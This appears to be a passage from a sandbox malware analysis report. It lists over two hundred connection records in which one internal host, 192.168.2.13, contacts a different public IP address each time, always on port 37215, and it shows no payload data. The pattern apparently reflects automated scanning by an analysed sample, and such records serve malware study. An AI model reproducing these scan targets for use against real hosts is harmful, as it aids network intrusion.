                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10131192.168.2.1346458134.184.65.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10132192.168.2.134574641.223.164.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10133192.168.2.1353302157.215.90.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10134192.168.2.135418041.211.194.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10135192.168.2.1340554197.155.80.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10136192.168.2.1345934197.122.188.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10137192.168.2.1338754171.57.109.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10138192.168.2.1349334157.211.26.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10139192.168.2.1350264157.89.226.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10140192.168.2.1344896157.134.31.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10141192.168.2.1346988197.195.243.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10142192.168.2.1336646157.137.227.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10143192.168.2.1354736197.84.214.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10144192.168.2.1358034190.183.237.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10145192.168.2.134443641.15.133.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10146192.168.2.1332830135.171.115.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10147192.168.2.1360228157.143.193.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10148192.168.2.1345646197.9.213.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10149192.168.2.1344492197.99.222.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10150192.168.2.133768876.89.68.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10151192.168.2.135718617.16.194.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10152192.168.2.1360920197.202.83.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10153192.168.2.1344418157.85.246.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10154192.168.2.1353808197.147.105.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10155192.168.2.1334416157.110.30.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10156192.168.2.135278044.89.76.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10157192.168.2.133482277.253.58.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10158192.168.2.1347382202.230.75.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10159192.168.2.1357726170.85.111.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10160192.168.2.1334168138.70.173.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10161192.168.2.1353890197.56.236.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10162192.168.2.1360434197.255.149.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10163192.168.2.1360190157.204.126.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10164192.168.2.1337218197.202.244.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10165192.168.2.136092241.90.225.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10166192.168.2.1353486197.81.253.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10167192.168.2.135467841.53.218.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10168192.168.2.133581041.55.65.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10169192.168.2.1333460197.50.159.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10170192.168.2.1351502197.226.76.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10171192.168.2.1335542157.223.201.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10172192.168.2.1355198197.192.48.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10173192.168.2.133921473.152.64.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10174192.168.2.135810241.231.36.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10175192.168.2.133445641.104.248.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10176192.168.2.134174420.142.152.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10177192.168.2.1346328197.114.89.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10178192.168.2.134530641.35.157.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10179192.168.2.1338696197.241.93.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10180192.168.2.1357014197.250.169.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10181192.168.2.1356394157.137.134.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10182192.168.2.1356724197.246.59.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10183192.168.2.135359841.202.50.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10184192.168.2.1333524197.38.127.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10185192.168.2.135764441.185.247.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10186192.168.2.1360276157.125.202.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10187192.168.2.134242841.243.54.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10188192.168.2.135444641.154.158.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10189192.168.2.1354686111.100.86.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10190192.168.2.1350728157.75.195.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10191192.168.2.1335404157.207.253.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10192192.168.2.136020041.4.213.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10193192.168.2.1340196157.78.17.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10194192.168.2.136010441.171.185.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10195192.168.2.134386241.216.255.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10196192.168.2.1359372197.199.241.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10197192.168.2.135021641.131.23.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10198192.168.2.135224259.165.220.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10199192.168.2.1344082157.128.152.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10200192.168.2.1356172197.217.1.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10201192.168.2.134135241.159.179.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10202192.168.2.1351808197.244.115.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10203192.168.2.1339184197.127.31.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10204192.168.2.1343496157.3.222.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10205192.168.2.1333144157.89.7.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10206192.168.2.1349416157.196.251.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10207192.168.2.133342441.98.37.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10208192.168.2.134558841.188.100.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10209192.168.2.1351322180.17.85.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10210192.168.2.1356432197.80.90.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10211192.168.2.1345168197.130.207.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10212192.168.2.1348106197.83.199.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10213192.168.2.135678841.26.119.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10214192.168.2.135583641.42.246.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10215192.168.2.1355126157.249.191.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10216192.168.2.1336882179.17.67.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10217192.168.2.1347338157.3.175.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10218192.168.2.135434641.125.224.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10219192.168.2.1341628125.58.153.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10220192.168.2.1340332124.114.162.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10221192.168.2.135004841.164.181.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10222192.168.2.1337986197.246.236.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10223192.168.2.135338641.125.176.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10224192.168.2.1353486197.51.0.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10225192.168.2.134253641.161.62.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10226192.168.2.1355946197.156.84.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10227192.168.2.135231641.51.113.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10228192.168.2.1360030157.174.191.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10229192.168.2.1334754136.148.10.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10230192.168.2.133909041.228.29.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10231192.168.2.1359118157.159.114.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10232192.168.2.1348358197.72.246.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10233192.168.2.1339954157.144.224.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10234192.168.2.134874041.12.17.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10235192.168.2.135118441.3.18.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10236192.168.2.1356772222.15.184.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10237192.168.2.133312041.18.149.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10238192.168.2.1350366197.155.3.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10239192.168.2.134852041.21.57.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10240192.168.2.135673041.104.252.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10241192.168.2.1346934157.132.100.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10242192.168.2.1338006157.194.163.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10243192.168.2.1354034197.108.251.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10244192.168.2.1342496157.36.103.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10245192.168.2.1360562157.142.80.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10246192.168.2.1340660157.97.76.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10247192.168.2.1348180157.59.234.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10248192.168.2.134564241.230.69.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10249192.168.2.135371041.206.144.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10250192.168.2.134131241.97.58.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10251192.168.2.135352841.94.123.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10252192.168.2.135427685.100.246.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10253192.168.2.1351514197.137.246.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10254192.168.2.1350188160.154.20.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10255192.168.2.134312441.9.39.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10256192.168.2.1341594197.1.254.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10257192.168.2.133644441.202.175.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10258192.168.2.135723274.109.89.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10259192.168.2.1333358128.225.249.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10260192.168.2.135533675.52.56.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10261192.168.2.1333030197.131.27.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10262192.168.2.133669841.28.137.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10263192.168.2.1344720157.156.180.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10264192.168.2.135389470.14.246.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10265192.168.2.1335110157.45.63.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10266192.168.2.1360336197.74.20.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10267192.168.2.1347692157.94.154.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10268192.168.2.1352992196.211.193.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10269192.168.2.1347736197.58.35.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10270192.168.2.13379181.156.207.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10271192.168.2.1347894122.16.168.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10272192.168.2.134102659.99.109.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10273192.168.2.1345782157.81.248.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10274192.168.2.1343742157.71.231.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10275192.168.2.135222241.45.221.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10276192.168.2.135662092.225.255.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10277192.168.2.134931441.236.218.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10278192.168.2.1353642157.234.121.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10279192.168.2.134669841.82.46.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10280192.168.2.134553041.51.109.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10281192.168.2.134710059.4.83.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10282192.168.2.1349580197.63.189.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10283192.168.2.1338038176.51.52.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10284192.168.2.133920841.160.169.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10285192.168.2.1343874157.81.161.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10286192.168.2.1337040157.237.41.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10287192.168.2.134552898.207.176.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10288192.168.2.134973041.40.241.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10289192.168.2.1343426157.7.224.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10290192.168.2.135448445.181.48.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10291192.168.2.1351096157.137.75.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10292192.168.2.135483241.101.208.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10293192.168.2.1333786197.161.104.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10294192.168.2.136088083.104.76.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10295192.168.2.1354538157.51.119.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10296192.168.2.1337964197.8.204.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10297192.168.2.1335000159.210.153.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10298192.168.2.134138218.219.243.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10299192.168.2.1344618140.42.16.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10300192.168.2.1336410157.13.133.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10301192.168.2.1334184157.241.19.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10302192.168.2.1342606197.178.167.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10303192.168.2.1340280109.161.36.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10304192.168.2.134049688.232.69.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10305192.168.2.1342020197.243.104.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10306192.168.2.1346934197.125.134.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10307192.168.2.1360926197.229.0.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10308192.168.2.1337638157.136.163.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10309192.168.2.1346338197.172.28.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10310192.168.2.136043241.163.156.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10311192.168.2.1334366197.119.253.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10312192.168.2.1334134157.187.174.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10313192.168.2.1334616197.154.147.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10314192.168.2.133557641.59.58.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10315192.168.2.1349050157.51.134.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10316192.168.2.135640041.57.79.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10317192.168.2.136016841.161.112.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10318192.168.2.1336150157.65.178.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10319192.168.2.1334102197.3.19.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10320192.168.2.1351748139.114.103.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10321192.168.2.135337641.53.244.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10322192.168.2.1344340157.38.32.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10323192.168.2.1334442157.216.187.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10324192.168.2.133528441.217.2.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10325192.168.2.1338502222.54.211.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10326192.168.2.134917841.63.218.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10327192.168.2.1344702139.177.182.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10328192.168.2.133414441.51.60.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10329192.168.2.134528465.28.157.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10330192.168.2.1347198157.19.74.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10331192.168.2.135908477.61.235.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10332192.168.2.1357704197.55.66.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10333192.168.2.134771244.96.77.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10334192.168.2.1335984157.95.183.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10335192.168.2.134912441.70.36.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10336192.168.2.1341614157.184.19.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10337192.168.2.1337574157.193.236.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10338192.168.2.133379441.26.198.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10339192.168.2.1349152203.150.169.5837215
                                                  TimestampBytes transferredDirectionData


